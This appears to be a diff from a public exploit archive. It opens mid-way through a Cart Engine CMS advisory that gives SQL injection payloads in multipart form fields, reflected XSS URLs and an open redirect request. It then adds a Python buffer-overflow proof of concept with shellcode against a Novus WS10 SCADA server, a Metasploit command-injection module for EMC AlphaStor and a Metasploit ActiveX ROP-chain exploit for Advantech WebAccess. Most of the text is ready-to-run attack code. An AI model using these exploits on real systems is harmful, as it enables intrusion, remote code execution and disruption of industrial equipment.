-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"
add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"
8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##
## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"
add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"
13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"
3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##
= Reflected XSS =
A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
"footer_content_block" are not sanitized, so an XSS attack can be executed on
multiple pages.
## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##
= Open Redirect =
An Open Redirect vulnerability has been detected on multiple pages in Cart
Engine CMS. The function "redir" in file "includes/function.php" doesn't check
the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
executed.
## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close
$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
sent 403, rcvd 380
=== Solution ===
Upgrade to Cart Engine 4.0.
=== Disclosure Timeline ===
2014-08-08 Vulnerability Discovered
2014-08-10 Initial vendor notification
2014-08-20 The vendor fixed the vulnerability
2014-09-15 Public advisory
=== References ===
[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

49
platforms/windows/dos/34752.c Executable file
View file

@ -0,0 +1,49 @@
## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
## Date: 09/23/2014
## Author: Pedro Sánchez
## Version: 1.83 (English)
## Tested on: Windows 7 embedded.
## Notified the vendor, vendor never responded.
## In the new version this PoC stops working
## Vendor: Novus
## http://www.novus.com.br
## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation
import os
import socket
import sys
## The process listens on TCP port 2001
host = sys.argv[1]
port = int(sys.argv[2])
print " PoC WS10 Data Server SCADA Exploit "
print " Pedro Sanchez "
shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90")
## Exploit contructor
ws10 = ("\x90" * 1024 + "\x44" * 31788)
ws10 += ("\xeb\x14")
ws10 += ("\x44" * 6)
ws10 += ("\xad\xbb\xc3\x77")
ws10 += ("\xb4\x73\xed\x77")
ws10 += ("\x90" * 21)
ws10 += shellcode
print " [+] Sending payload..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(ws10)
data = s.recv(1024)
print " [+] Closing..."
s.close()
print " [+] Done!"

121
platforms/windows/remote/34756.rb Executable file
View file

@ -0,0 +1,121 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
'Description' => %q{
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
command, the process does not properly filter user supplied input allowing for arbitrary
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
with Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
'Mohsan Farid <faridms[at]gmail.com>', # msf module
'Brent Morris <inkrypto[at]gmail.com>', # msf module
'juan vazquez' # convert aux module into exploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0928'],
['ZDI', '13-033']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
Opt::RPORT(3000)
], self.class )
end
def check
packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
res = send_packet(packet)
if res && res =~ /Could not fork command/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager({ :linemax => 487 })
end
def execute_command(cmd, opts)
padding = rand_text_alpha_upper(489 - cmd.length)
packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
connect
sock.put(packet)
begin
sock.get_once
rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
end
disconnect
end
def execute_cmdstager_begin(opts)
if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
cmd_list.each do |cmd|
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
end
end
end
def send_packet(packet)
connect
sock.put(packet)
begin
meta_data = sock.get_once(8)
rescue EOFError
meta_data = nil
end
unless meta_data
disconnect
return nil
end
code, length = meta_data.unpack("N*")
unless code == 1
disconnect
return nil
end
begin
data = sock.get_once(length)
rescue EOFError
data = nil
ensure
disconnect
end
data
end
end

163
platforms/windows/remote/34757.rb Executable file
View file

@ -0,0 +1,163 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
sprintf can be reached with user controlled data through the GetColor function.
This module has been tested successfully on Windows XP SP3 with IE6 and Windows
7 SP1 with IE8 and IE 9.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2364'],
['ZDI', '14-255'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
],
'DefaultOptions' =>
{
'Retries' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => /MSIE/i,
:ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
:clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
:method => "GetColor"
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x5c",
# Patch the stack to execute the decoder...
'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
# Fix the stack again, this time better :), before the payload
# is executed.
'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 17 2014'))
end
def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")
content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
EOS
print_status("Sending #{self.name}")
send_response_html(cli, content, {'Pragma' => 'no-cache'})
end
# Uses gadgets from ijl11.dll 1.1.2.16
def rop_payload(code)
xpl = rand_text_alphanumeric(61) # offset
xpl << [0x60014185].pack("V") # RET
xpl << rand_text_alphanumeric(8)
# EBX = dwSize (0x40)
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << [0x9ffdafc9].pack("V") # eax value
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
xpl << [0x60018084].pack("V") # POP EBP # RETN
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
# EDX = flAllocationType (0x1000)
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << [0x9ffdbf89].pack("V") # eax value
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
# ECX = flProtect (0x40)
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
0x41.times do
xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
end
# EAX = ptr to &VirtualAlloc()
xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
# EBP = POP (skip 4 bytes)
xpl << [0x6002054b].pack("V") # POP EBP # RETN
xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
# ESI = ptr to JMP [EAX]
xpl << [0x600181cc].pack("V") # POP ESI # RETN
xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
# EDI = ROP NOP (RETN)
xpl << [0x60021ad1].pack("V") # POP EDI # RETN
xpl << [0x60021ad2].pack("V") # ptr to &(retn)
# ESP = lpAddress (automatic)
# PUSHAD # RETN
xpl << [0x60018399].pack("V") # PUSHAD # RETN
xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
xpl << code
xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
xpl
end
end